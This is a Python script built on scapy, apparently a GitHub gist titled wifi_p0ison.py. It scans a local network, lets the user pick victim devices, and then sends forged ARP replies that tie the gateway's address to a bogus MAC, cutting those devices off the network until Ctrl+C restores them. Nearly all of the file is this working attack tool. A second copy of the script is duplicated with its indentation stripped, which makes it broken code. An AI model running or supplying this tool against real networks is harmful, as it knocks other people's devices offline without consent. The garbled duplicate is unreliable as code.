andreafioraldi/wifi_p0ison.py

## wifi_p0ison.py
#!/usr/bin/env python

import time
import os
import requests
from scapy.all import *

DEFAULT_BAD_GATEWAY = '12:34:56:78:9A:BC'

class Device(object):
    def __init__(self, ip, mac, vendor):
        self.ip = ip
        self.mac = mac
        self.vendor = vendor

    def __str__(self):
        return "%s   %s   %s" % (self.ip, self.mac, self.vendor)

def scan_lan():
    # get lan ip (works only with internet connection)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("google.com", 80))
    lan_ip = s.getsockname()[0]
    s.close()
    # lan ip range (like 192.168.1.*)
    lan_range = lan_ip[:lan_ip.rfind(".") +1] + "*"
    # get gateway ip (assumed .1)
    gateway_ip = lan_ip[:lan_ip.rfind(".") +1] + "1"
    gateway_mac = None

    answers, _ = arping(lan_range, verbose=0)
    scan_result = []
    for answer in answers:
        mac = answer[1].hwsrc
        ip = answer[1].psrc
        if ip == gateway_ip:
            gateway_mac = mac
        try:
            r = requests.get('http://macvendors.co/api/%s' % mac)
            vendor = str(r.json()["result"]["company"])
        except:
            vendor = "<vendor not found>"
        scan_result += [Device(ip, mac, vendor)]

    return gateway_ip, gateway_mac, scan_result

def poison(device, gateway_ip):
    # an ARP packet to associate the gateway ip with a wrong mac address
    packet = ARP(op=2, psrc=gateway_ip, hwsrc=DEFAULT_BAD_GATEWAY, pdst=device.ip, hwdst=device.mac)
    send(packet, verbose=0)

def restore(device, gateway_ip, gateway_mac):
    # an ARP packet to associate the gateway ip with teh correct mac address
    packet = ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac, pdst=device.ip, hwdst=device.mac)
    send(packet, verbose=0)


def banner():
    print
    print " ]===== wif1_p0ison.py =====["
    print " ]====== by malweisse ======["
    print
    print " [ commands ]"
    print "   scan          :: scan the lan for devices"
    print "   devices       :: print prevous scanned devices"
    print "   add <idx>     :: add devices[idx] to the to-block list"
    print "   add all       :: add all scanned devices to the to-block list"
    print "   remove <idx>  :: remove to-block[idx] from the to-block list"
    print "   remove all    :: clean the to-block list"
    print "   list          :: print the to-block list"
    #print "   restore <idx> :: reset device[idx] with correct gateway"
    print "   run           :: poison all devices in the to-block list"
    print "   quit          :: quit shell"
    print

def shell():
    gateway_ip = None
    gateway_mac = None
    devices = []
    block_list = []

    while True:
        cmd = raw_input(":> ")
        cmd = cmd.split()
        if len(cmd) == 0:
            continue

        if cmd[0] == "scan":
            print " >> scanning lan..."
            gateway_ip, gateway_mac, devices = scan_lan()
            for i in xrange(len(devices)):
                print " (id: %d)  " % i, devices[i]
            print " >> scan completed"
            if gateway_mac == None:
                print " >> WARNING! gateway not found so i can't restore normal wifi behaviour after poisoning!"
                print " >> quit if you don't know what are you doing."
        elif cmd[0] == "devices":
            print " >> scanned devices"
            for i in xrange(len(devices)):
                print " (id: %d)  " % i, devices[i]
        elif cmd[0] == "add":
            if len(cmd) == 1:
                print " >> invalid idx"
                continue
            if cmd[1] == "all":
                for i in xrange(len(devices)):
                    block_list.append(devices[dev_id])
                continue
            try:
                dev_id = int(cmd[1])
            except:
                print " >> invalid idx"
                continue
            if dev_id < 0 or dev_id >= len(devices):
                print " >> invalid idx"
                continue
            block_list.append(devices[dev_id])
        elif cmd[0] == "remove":
            if len(cmd) == 1:
                print " >> invalid idx"
                continue
            if cmd[1] == "all":
                block_list = []
                continue
            try:
                dev_id = int(cmd[1])
            except:
                print " >> invalid idx"
                continue
            if dev_id < 0 or dev_id >= len(block_list):
                print " >> invalid idx"
                continue
            block_list.pop(dev_id)
        elif cmd[0] == "list":
            print " >> to-block list"
            for i in xrange(len(block_list)):
                print " (id: %d)  " % i, block_list[i]
        elif cmd[0] == "run":
            print " >> poisoning..."
            print " >> press CTRL+C to stop"
            while True:
                try:
                    for victim in block_list:
                        poison(victim, gateway_ip)
                except KeyboardInterrupt:
                    if gateway_mac == None:
                        print " >> unable to restore without the gateway mac"
                    else:
                        print " >> restoring..."
                        for victim in block_list:
                            restore(victim, gateway_ip, gateway_mac)
                        print ' >> done'
                    break
        elif cmd[0] == "quit":
            exit(0)
        else:
            print " >> invalid command"

def main():
    if os.geteuid() != 0:
        print " >> please use the root user"
        exit(1)
    banner()
    shell()

if __name__ == "__main__":
    main()
	#!/usr/bin/env python

	import time
	import os
	import requests
	from scapy.all import *

	DEFAULT_BAD_GATEWAY = '12:34:56:78:9A:BC'

	class Device(object):
	def __init__(self, ip, mac, vendor):
	self.ip = ip
	self.mac = mac
	self.vendor = vendor

	def __str__(self):
	return "%s %s %s" % (self.ip, self.mac, self.vendor)

	def scan_lan():
	# get lan ip (works only with internet connection)
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	s.connect(("google.com", 80))
	lan_ip = s.getsockname()[0]
	s.close()
	# lan ip range (like 192.168.1.*)
	lan_range = lan_ip[:lan_ip.rfind(".") +1] + "*"
	# get gateway ip (assumed .1)
	gateway_ip = lan_ip[:lan_ip.rfind(".") +1] + "1"
	gateway_mac = None

	answers, _ = arping(lan_range, verbose=0)
	scan_result = []
	for answer in answers:
	mac = answer[1].hwsrc
	ip = answer[1].psrc
	if ip == gateway_ip:
	gateway_mac = mac
	try:
	r = requests.get('http://macvendors.co/api/%s' % mac)
	vendor = str(r.json()["result"]["company"])
	except:
	vendor = "<vendor not found>"
	scan_result += [Device(ip, mac, vendor)]

	return gateway_ip, gateway_mac, scan_result

	def poison(device, gateway_ip):
	# an ARP packet to associate the gateway ip with a wrong mac address
	packet = ARP(op=2, psrc=gateway_ip, hwsrc=DEFAULT_BAD_GATEWAY, pdst=device.ip, hwdst=device.mac)
	send(packet, verbose=0)

	def restore(device, gateway_ip, gateway_mac):
	# an ARP packet to associate the gateway ip with teh correct mac address
	packet = ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac, pdst=device.ip, hwdst=device.mac)
	send(packet, verbose=0)


	def banner():
	print
	print " ]===== wif1_p0ison.py =====["
	print " ]====== by malweisse ======["
	print
	print " [ commands ]"
	print " scan :: scan the lan for devices"
	print " devices :: print prevous scanned devices"
	print " add <idx> :: add devices[idx] to the to-block list"
	print " add all :: add all scanned devices to the to-block list"
	print " remove <idx> :: remove to-block[idx] from the to-block list"
	print " remove all :: clean the to-block list"
	print " list :: print the to-block list"
	#print " restore <idx> :: reset device[idx] with correct gateway"
	print " run :: poison all devices in the to-block list"
	print " quit :: quit shell"
	print

	def shell():
	gateway_ip = None
	gateway_mac = None
	devices = []
	block_list = []

	while True:
	cmd = raw_input(":> ")
	cmd = cmd.split()
	if len(cmd) == 0:
	continue

	if cmd[0] == "scan":
	print " >> scanning lan..."
	gateway_ip, gateway_mac, devices = scan_lan()
	for i in xrange(len(devices)):
	print " (id: %d) " % i, devices[i]
	print " >> scan completed"
	if gateway_mac == None:
	print " >> WARNING! gateway not found so i can't restore normal wifi behaviour after poisoning!"
	print " >> quit if you don't know what are you doing."
	elif cmd[0] == "devices":
	print " >> scanned devices"
	for i in xrange(len(devices)):
	print " (id: %d) " % i, devices[i]
	elif cmd[0] == "add":
	if len(cmd) == 1:
	print " >> invalid idx"
	continue
	if cmd[1] == "all":
	for i in xrange(len(devices)):
	block_list.append(devices[dev_id])
	continue
	try:
	dev_id = int(cmd[1])
	except:
	print " >> invalid idx"
	continue
	if dev_id < 0 or dev_id >= len(devices):
	print " >> invalid idx"
	continue
	block_list.append(devices[dev_id])
	elif cmd[0] == "remove":
	if len(cmd) == 1:
	print " >> invalid idx"
	continue
	if cmd[1] == "all":
	block_list = []
	continue
	try:
	dev_id = int(cmd[1])
	except:
	print " >> invalid idx"
	continue
	if dev_id < 0 or dev_id >= len(block_list):
	print " >> invalid idx"
	continue
	block_list.pop(dev_id)
	elif cmd[0] == "list":
	print " >> to-block list"
	for i in xrange(len(block_list)):
	print " (id: %d) " % i, block_list[i]
	elif cmd[0] == "run":
	print " >> poisoning..."
	print " >> press CTRL+C to stop"
	while True:
	try:
	for victim in block_list:
	poison(victim, gateway_ip)
	except KeyboardInterrupt:
	if gateway_mac == None:
	print " >> unable to restore without the gateway mac"
	else:
	print " >> restoring..."
	for victim in block_list:
	restore(victim, gateway_ip, gateway_mac)
	print ' >> done'
	break
	elif cmd[0] == "quit":
	exit(0)
	else:
	print " >> invalid command"

	def main():
	if os.geteuid() != 0:
	print " >> please use the root user"
	exit(1)
	banner()
	shell()

	if __name__ == "__main__":
	main()